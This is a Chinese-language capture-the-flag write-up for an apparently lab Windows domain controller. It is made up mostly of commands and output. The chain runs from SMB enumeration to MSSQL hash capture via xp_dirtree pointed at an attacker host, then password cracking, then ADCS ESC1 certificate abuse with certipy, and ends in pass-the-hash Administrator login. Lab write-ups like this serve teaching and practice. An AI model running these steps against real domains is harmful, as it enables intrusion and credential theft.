基本信息

端口扫描

windows域靶机,还有445,1433:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
$ nmap -sC -sV -Pn 10.10.11.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 14:57 CST
Nmap scan report for 10.10.11.202
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-28 14:58:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-28T14:54:27
|_Not valid after: 2053-02-28T14:54:27
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-28T14:59:31+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-02-28T14:59:30+00:00; +8h00m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-02-28T14:58:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds

SMB

smb匿名访问,public里得到一个pdf:

1
2
3
smbclient -N -L 10.10.11.202
smbclient -N //10.10.11.202/Public
get "SQL Server Procedures.pdf"

SQL Server Procedures.pdf

pdf中给出了mssql的账号密码:

1
2
PublicUser
GuestUserCantWrite1

MSSQL

使用得到的账号密码连接:

1
impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202

常规responder+xp_dirtree得到sql_svc hash:

1
2
3
sudo python3 Responder.py -i 10.10.14.9 -v

SQL> exec xp_dirtree '\\10.10.14.9\miao'

破解出来密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

REGGIE1234ronnie (sql_svc)

sql_svc

使用得到的密码登录,现在还不是user:

1
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

翻文件发现C:\SQLServer\logs中有一个日志文件,其中得到另一个用户的账号密码,模拟的是使用用户账号密码登录数据库被记录到日志中的场景:

1
2
sequel.htb\Ryan.Cooper
NuclearMosquito3

user flag

使用sql日志中得到的账号密码登录,桌面得到user flag:

1
evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3

ADCS

提权部分是adcs,可以使用certipy远程进行:

发现脆弱的证书模板:

1
2
3
4
5
certipy find -vulnerable -stdout -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202

Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA

ESC1

直接根据文档里的ESC1利用方式一步步来即可得到administrator的NTLM hash:

1
2
3
4
5
6
7
8
certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target 10.10.11.202 -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb -dns 10.10.11.202 -dc-ip 10.10.11.202

# auth时可能会报错时钟偏移问题,先ntp同步时间
sudo ntpdate -s 10.10.11.202

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.202

[*] Got NT hash for 'administrator@sequel.htb': a52f78e4c751e5f5e17e1e9f3e58f4ee

root flag

使用得到的hash登录:

1
evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

参考资料